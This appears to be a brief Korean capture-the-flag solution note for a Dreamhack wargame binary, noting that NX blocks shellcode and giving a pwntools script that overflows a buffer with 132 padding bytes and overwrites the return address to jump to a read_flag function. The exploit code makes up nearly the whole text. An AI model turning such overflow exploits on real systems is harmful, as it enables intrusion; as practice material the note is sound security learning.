<aside> 💊 NX가 enabled이므로 ShellCode 실행 불가.
</aside>
Func Address : read_flag
from pwn import *
p = remote("host1.dreamhack.games", 13456)
payload = b"\\x90"*132
payload += b"\\xb9\\x85\\x04\\x08" #Little Endian
p.sendline(payload)
p.interactive()